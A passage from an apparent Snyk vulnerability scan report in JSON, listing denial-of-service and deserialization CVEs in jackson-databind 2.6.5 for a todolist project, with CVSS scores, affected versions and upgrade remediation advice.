"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.6.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": 
[], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - 
"title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": 
"2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization 
of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - 
"className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - 
"url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for 
[CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - 
"level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - 